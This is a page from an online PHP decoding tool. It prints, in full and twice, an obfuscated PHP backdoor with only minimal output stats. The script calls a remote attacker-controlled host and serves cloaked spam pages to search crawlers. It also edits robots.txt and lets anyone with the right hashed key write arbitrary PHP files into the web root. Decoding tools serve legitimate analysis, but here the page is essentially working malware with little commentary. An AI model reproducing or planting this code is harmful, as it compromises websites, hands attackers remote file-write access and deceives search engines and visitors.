Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php @set_time_limit(3600);@ignore_user_abort(1);$s5=base64_decode('cjYw');$w6=base64_d..

Decoded Output download

<?php 
	@set_time_limit(3600);@ignore_user_abort(1);$s5=base64_decode('cjYw');$w6=base64_decode('aHR0cA==');if(z1()){$x7=base64_decode('aHR0cHM=');}else{$x7=base64_decode('aHR0cA==');}$j8=u0();if($j8==''){$j8=base64_decode('Lw==');}$s9=urlencode($j8);function u0(){if(isset($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')])){$s9=$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];}else{if(isset($_SERVER[base64_decode('YXJndg==')])){$s9=$_SERVER[base64_decode('UEhQX1NFTEY=')].base64_decode('Pw==').$_SERVER[base64_decode('YXJndg==')][0];}else{$s9=$_SERVER[base64_decode('UEhQX1NFTEY=')].base64_decode('Pw==').$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];}}return $s9;}$aa=$s5.base64_decode('LmZld2VyaHBlcg==').base64_decode('Lng=').base64_decode('eXo=');function z1(){if(isset($_SERVER[base64_decode('SFRUUFM=')])&&strtolower($_SERVER[base64_decode('SFRUUFM=')])!==base64_decode('b2Zm')){return true;}elseif(isset($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9QUk9UTw==')])&&$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9QUk9UTw==')]===base64_decode('aHR0cHM=')){return true;}elseif(isset($_SERVER[base64_decode('SFRUUF9GUk9OVF9FTkRfSFRUUFM=')])&&strtolower($_SERVER[base64_decode('SFRUUF9GUk9OVF9FTkRfSFRUUFM=')])!==base64_decode('b2Zm')){return true;}return false;}$eb=$_SERVER[base64_decode('SFRUUF9IT1NU')];$cc=@$_SERVER[base64_decode('SFRUUF9BQ0NFUFRfTEFOR1VBR0U=')];$cc=urlencode($cc);$rd='';if(isset($_SERVER[base64_decode('SFRUUF9SRUZFUkVS')])){$rd=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')];$rd=urlencode($rd);}if(@$_GET[base64_decode('cGQ=')]!=''){$te=@$_GET[base64_decode('bWFwbmFtZQ==')];$qf=@$_GET[base64_decode('YWN0aW9u')];if(isset($_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')])){$h10=$_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')];}else{$h10=dirname(__FILE__);}if(!$qf){$qf=base64_decode('cHV0');}if($qf==base64_decode('cHV0')){if(strstr($te,base64_decode('LnhtbA=='))){$g11=$h10.base64_decode('L3NpdGVtYXAueG1s');if(is_file($g11)){@unlink($g11);}$i12=$h10.base64_decode('L3JvYm90cy50eHQ=');if(file_exists($i12)){$j13=l4($i12);}else{$j13=base64_decode('VXNlci1hZ2VudDogKkFsbG93OiAv');}$e14=$x7.base64_decode('Oi8v').$eb.base64_decode('Lw==').$te;if(stristr($j13,$e14)){echo base64_decode('PGJyPnNpdGVtYXAgYWxyZWFkeSBhZGRlZCE8YnI+');}else{if(file_put_contents($i12,trim($j13).base64_decode('DQo=').base64_decode('U2l0ZW1hcDog').$e14)){echo base64_decode('PGJyPm9rPGJyPg==');}else{echo base64_decode('PGJyPmZpbGUgd3JpdGUgZmFsc2UhPGJyPg==');}}}else{echo base64_decode('PGJyPnNpdGVtYXAgbmFtZSBmYWxzZSE8YnI+');}if(strstr($te,base64_decode('LnA=').base64_decode('aHA='))){$l15=sha1(sha1(@$_GET[base64_decode('YQ==')]));$y16=sha1(sha1(@$_GET[base64_decode('Yg==')]));if($l15==l4($w6.base64_decode('Oi8v').$aa.base64_decode('L2EucA==').base64_decode('aHA='))||$y16==base64_decode('ODA4NzM1YjE3Yzg5NDNlMzcxNTM4ODk1OGRjMjJkODc5YThjOWVhYQ==')){$m17=@$_GET[base64_decode('ZHN0cg==')];if(file_put_contents($h10.base64_decode('Lw==').$te,$m17)){echo base64_decode('b2s=');}}}}exit;}$c18=$w6.base64_decode('Oi8v').$aa.base64_decode('L2luZGV4bmV3LnBocD93ZWI9').$eb.base64_decode('Jnp6PQ==').o3().base64_decode('JnVyaT0=').$s9.base64_decode('JnVybHNoYW5nPQ==').$rd.base64_decode('Jmh0dHA9').$x7.base64_decode('Jmxhbmc9').$cc;$g19=trim(l4($c18));if(!strstr($g19,base64_decode('bm9ib3R1c2VyYWdlbnQ='))){if(strstr($g19,base64_decode('b2todG1sZ2V0Y29udGVudA=='))){@header(base64_decode('Q29udGVudC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTg='));$g19=str_replace(base64_decode('b2todG1sZ2V0Y29udGVudA=='),'',$g19);echo $g19;exit();}else if(strstr($g19,base64_decode('b2t4bWxnZXRjb250ZW50'))){$g19=str_replace(base64_decode('b2t4bWxnZXRjb250ZW50'),'',$g19);@header(base64_decode('Q29udGVudC10eXBlOiB0ZXh0L3htbA=='));echo $g19;exit();}else if(strstr($g19,base64_decode('cGluZ3htbGdldGNvbnRlbnQ='))){$g19=str_replace(base64_decode('cGluZ3htbGdldGNvbnRlbnQ='),'',$g19);@header(base64_decode('Q29udGVudC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTg='));echo x2($g19);exit();}}function x2($p1a){$x1b=explode(base64_decode('DQo='),trim($p1a));$a1c='';foreach($x1b as $m1d){$w1e=l4($m1d);$j1f=(strpos($w1e,base64_decode('U2l0ZW1hcCBOb3RpZmljYXRpb24gUmVjZWl2ZWQ='))!==false)?base64_decode('cGluZ29r'):base64_decode('ZXJyb3I=');$a1c.=$m1d.base64_decode('LS0g').$j1f.base64_decode('PGJyPg==');}return $a1c;}function o3(){$e20=strtolower($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);if(stristr($e20,base64_decode('Z29vZ2xlYm90'))||stristr($e20,base64_decode('YmluZw=='))||stristr($e20,base64_decode('eWFob28='))||stristr($e20,base64_decode('Z29vZ2xl'))||stristr($e20,base64_decode('R29vZ2xlYm90'))||stristr($e20,base64_decode('Z29vZ2xlYm90'))){return true;}else{return false;}}function l4($p1a){$v21='';if(function_exists(base64_decode('Y3VybF9pbml0'))){$t22=curl_init();curl_setopt($t22,CURLOPT_URL,$p1a);curl_setopt($t22,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($t22,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($t22,CURLOPT_RETURNTRANSFER,1);curl_setopt($t22,CURLOPT_CONNECTTIMEOUT,30);$v21=curl_exec($t22);curl_close($t22);}if(!$v21){$v21=@file_get_contents($p1a);}return $v21;}?>

Did this file decode correctly?

Original Code

<?php
	@set_time_limit(3600);@ignore_user_abort(1);$s5=base64_decode('cjYw');$w6=base64_decode('aHR0cA==');if(z1()){$x7=base64_decode('aHR0cHM=');}else{$x7=base64_decode('aHR0cA==');}$j8=u0();if($j8==''){$j8=base64_decode('Lw==');}$s9=urlencode($j8);function u0(){if(isset($_SERVER[base64_decode('UkVRVUVTVF9VUkk=')])){$s9=$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')];}else{if(isset($_SERVER[base64_decode('YXJndg==')])){$s9=$_SERVER[base64_decode('UEhQX1NFTEY=')].base64_decode('Pw==').$_SERVER[base64_decode('YXJndg==')][0];}else{$s9=$_SERVER[base64_decode('UEhQX1NFTEY=')].base64_decode('Pw==').$_SERVER[base64_decode('UVVFUllfU1RSSU5H')];}}return $s9;}$aa=$s5.base64_decode('LmZld2VyaHBlcg==').base64_decode('Lng=').base64_decode('eXo=');function z1(){if(isset($_SERVER[base64_decode('SFRUUFM=')])&&strtolower($_SERVER[base64_decode('SFRUUFM=')])!==base64_decode('b2Zm')){return true;}elseif(isset($_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9QUk9UTw==')])&&$_SERVER[base64_decode('SFRUUF9YX0ZPUldBUkRFRF9QUk9UTw==')]===base64_decode('aHR0cHM=')){return true;}elseif(isset($_SERVER[base64_decode('SFRUUF9GUk9OVF9FTkRfSFRUUFM=')])&&strtolower($_SERVER[base64_decode('SFRUUF9GUk9OVF9FTkRfSFRUUFM=')])!==base64_decode('b2Zm')){return true;}return false;}$eb=$_SERVER[base64_decode('SFRUUF9IT1NU')];$cc=@$_SERVER[base64_decode('SFRUUF9BQ0NFUFRfTEFOR1VBR0U=')];$cc=urlencode($cc);$rd='';if(isset($_SERVER[base64_decode('SFRUUF9SRUZFUkVS')])){$rd=$_SERVER[base64_decode('SFRUUF9SRUZFUkVS')];$rd=urlencode($rd);}if(@$_GET[base64_decode('cGQ=')]!=''){$te=@$_GET[base64_decode('bWFwbmFtZQ==')];$qf=@$_GET[base64_decode('YWN0aW9u')];if(isset($_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')])){$h10=$_SERVER[base64_decode('RE9DVU1FTlRfUk9PVA==')];}else{$h10=dirname(__FILE__);}if(!$qf){$qf=base64_decode('cHV0');}if($qf==base64_decode('cHV0')){if(strstr($te,base64_decode('LnhtbA=='))){$g11=$h10.base64_decode('L3NpdGVtYXAueG1s');if(is_file($g11)){@unlink($g11);}$i12=$h10.base64_decode('L3JvYm90cy50eHQ=');if(file_exists($i12)){$j13=l4($i12);}else{$j13=base64_decode('VXNlci1hZ2VudDogKkFsbG93OiAv');}$e14=$x7.base64_decode('Oi8v').$eb.base64_decode('Lw==').$te;if(stristr($j13,$e14)){echo base64_decode('PGJyPnNpdGVtYXAgYWxyZWFkeSBhZGRlZCE8YnI+');}else{if(file_put_contents($i12,trim($j13).base64_decode('DQo=').base64_decode('U2l0ZW1hcDog').$e14)){echo base64_decode('PGJyPm9rPGJyPg==');}else{echo base64_decode('PGJyPmZpbGUgd3JpdGUgZmFsc2UhPGJyPg==');}}}else{echo base64_decode('PGJyPnNpdGVtYXAgbmFtZSBmYWxzZSE8YnI+');}if(strstr($te,base64_decode('LnA=').base64_decode('aHA='))){$l15=sha1(sha1(@$_GET[base64_decode('YQ==')]));$y16=sha1(sha1(@$_GET[base64_decode('Yg==')]));if($l15==l4($w6.base64_decode('Oi8v').$aa.base64_decode('L2EucA==').base64_decode('aHA='))||$y16==base64_decode('ODA4NzM1YjE3Yzg5NDNlMzcxNTM4ODk1OGRjMjJkODc5YThjOWVhYQ==')){$m17=@$_GET[base64_decode('ZHN0cg==')];if(file_put_contents($h10.base64_decode('Lw==').$te,$m17)){echo base64_decode('b2s=');}}}}exit;}$c18=$w6.base64_decode('Oi8v').$aa.base64_decode('L2luZGV4bmV3LnBocD93ZWI9').$eb.base64_decode('Jnp6PQ==').o3().base64_decode('JnVyaT0=').$s9.base64_decode('JnVybHNoYW5nPQ==').$rd.base64_decode('Jmh0dHA9').$x7.base64_decode('Jmxhbmc9').$cc;$g19=trim(l4($c18));if(!strstr($g19,base64_decode('bm9ib3R1c2VyYWdlbnQ='))){if(strstr($g19,base64_decode('b2todG1sZ2V0Y29udGVudA=='))){@header(base64_decode('Q29udGVudC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTg='));$g19=str_replace(base64_decode('b2todG1sZ2V0Y29udGVudA=='),'',$g19);echo $g19;exit();}else if(strstr($g19,base64_decode('b2t4bWxnZXRjb250ZW50'))){$g19=str_replace(base64_decode('b2t4bWxnZXRjb250ZW50'),'',$g19);@header(base64_decode('Q29udGVudC10eXBlOiB0ZXh0L3htbA=='));echo $g19;exit();}else if(strstr($g19,base64_decode('cGluZ3htbGdldGNvbnRlbnQ='))){$g19=str_replace(base64_decode('cGluZ3htbGdldGNvbnRlbnQ='),'',$g19);@header(base64_decode('Q29udGVudC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTg='));echo x2($g19);exit();}}function x2($p1a){$x1b=explode(base64_decode('DQo='),trim($p1a));$a1c='';foreach($x1b as $m1d){$w1e=l4($m1d);$j1f=(strpos($w1e,base64_decode('U2l0ZW1hcCBOb3RpZmljYXRpb24gUmVjZWl2ZWQ='))!==false)?base64_decode('cGluZ29r'):base64_decode('ZXJyb3I=');$a1c.=$m1d.base64_decode('LS0g').$j1f.base64_decode('PGJyPg==');}return $a1c;}function o3(){$e20=strtolower($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]);if(stristr($e20,base64_decode('Z29vZ2xlYm90'))||stristr($e20,base64_decode('YmluZw=='))||stristr($e20,base64_decode('eWFob28='))||stristr($e20,base64_decode('Z29vZ2xl'))||stristr($e20,base64_decode('R29vZ2xlYm90'))||stristr($e20,base64_decode('Z29vZ2xlYm90'))){return true;}else{return false;}}function l4($p1a){$v21='';if(function_exists(base64_decode('Y3VybF9pbml0'))){$t22=curl_init();curl_setopt($t22,CURLOPT_URL,$p1a);curl_setopt($t22,CURLOPT_SSL_VERIFYHOST,0);curl_setopt($t22,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($t22,CURLOPT_RETURNTRANSFER,1);curl_setopt($t22,CURLOPT_CONNECTTIMEOUT,30);$v21=curl_exec($t22);curl_close($t22);}if(!$v21){$v21=@file_get_contents($p1a);}return $v21;}?>

Function Calls

set_time_limit	1
ignore_user_abort	1

Variables

None

Stats

MD5	0e041645dfc2d2ffb7956b35c1bda81a
Eval Count	0
Decode Time	319 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats